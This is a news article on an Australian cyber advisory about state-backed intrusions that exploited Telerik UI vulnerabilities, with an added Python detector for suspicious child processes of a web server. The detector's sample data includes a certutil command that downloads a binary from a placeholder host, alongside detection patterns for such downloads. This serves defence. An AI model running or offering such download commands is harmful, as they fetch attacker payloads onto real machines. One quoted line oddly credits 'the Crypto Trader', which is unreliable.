Massive cyber attack on Australia uses exploits for cryptojacking

The Australian Cyber Security Centre said that a group of "state actors" hacked into Australian networks on June 19 and that one of the vulnerabilities they exploited is related to cryptojacking malware attacks.

According to the 48-page report released on June 24, the threat actors exploited four critical vulnerabilities in Telerik UI, including CVE-2019-18935, which was recently exploited by the Blue Mockingbird malware gang to infect thousands of systems with XMRig, a Monero (XMR) mining program.

The vulnerability is mainly used for cryptojacking purposes

Although the warning did not say whether hackers might have installed cryptojacking malware during the recent massive cyber attack, this vulnerability is the preferred way for cybercriminals to install cryptojacking applications on corporate networks.

The report goes into detail on CVE-2019-18935, and its findings resemble those Cointelegraph reported on the Blue Mockingbird attack, although it does not imply that the gang was involved in the cyber attack against Australia:

"Other exploits were identified by the Crypto Trader most commonly when the actor's attempt at a reverse shell was unsuccessful. These included: an exploit attempting to run a PowerShell reverse shell; an exploit attempting to run certutil.exe to download another payload; a payload running binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but having no persistence mechanism; a payload listing the absolute path of the web root and writing that path to a file within the web root."
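
The PowerShell and certutil.exe payloads quoted above both surface as unusual child processes of the web server. The following Python check is an added example, not taken from the report or the original article; the `w3wp.exe` parent (IIS hosting the Telerik-based site), the JSON-lines event format and every sample event are assumptions constructed for illustration.

```python
import json
import re

# Assumption: the exposed Telerik-based site runs in the IIS worker process.
WEB_PARENTS = {"w3wp.exe"}

# (rule name, child image pattern, command-line pattern or None for "any")
RULES = [
    ("powershell-from-web-worker", re.compile(r"(powershell|pwsh)\.exe"), None),
    ("certutil-download", re.compile(r"certutil\.exe"),
     re.compile(r"[-/](urlcache|verifyctl)\b.*https?://", re.I)),
]

# Constructed process-creation events (JSON lines); hosts, paths and times are made up.
SAMPLE_EVENTS = r"""
{"time": "T+00:01", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe", "cmd": "csc.exe /noconfig @C:\\Windows\\Temp\\x.cmdline"}
{"time": "T+00:02", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -nop -w hidden -c <elided>"}
{"time": "T+00:03", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmd": "certutil.exe -urlcache -split -f http://files.example.test/a.bin C:\\Windows\\Temp\\a.bin"}
{"time": "T+00:04", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmd": "certutil.exe -hashfile C:\\Users\\admin\\setup.msi SHA256"}
{"time": "T+00:05", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe Get-Service"}
"""


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect(text):
    """Return (time, rule) for each event where a web worker spawned a flagged child."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if basename(ev["parent"]) not in WEB_PARENTS:
            continue  # only children of the web server process are of interest
        image = basename(ev["image"])
        for name, image_re, cmd_re in RULES:
            if image_re.fullmatch(image) and (cmd_re is None or cmd_re.search(ev["cmd"])):
                hits.append((ev["time"], name))
    return hits


if __name__ == "__main__":
    for when, rule in detect(SAMPLE_EVENTS):
        print(when, rule)
```

The `csc.exe` event is left unflagged on purpose: ASP.NET compiling pages under `w3wp.exe` is normal, which is why the rules name specific child images instead of alerting on any child process.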

Were there groups of Chinese state-backed hackers behind the attack?

Nearly 10 Chinese hacker groups that are involved in spying activities and allegedly have connections to the Chinese government count PlugX among their tools, and PlugX was one of the malware families identified in the Australian government's report.

Some Australian officials have suggested that China may be behind the massive cyber attack, as diplomatic problems have been growing between the two countries. The attack was said to have possibly come after Australia sought an investigation into the origin of the COVID-19 virus, a move that Chinese officials did not welcome: they considered it a "discriminatory" charge and responded with commercial retaliation against Australia.
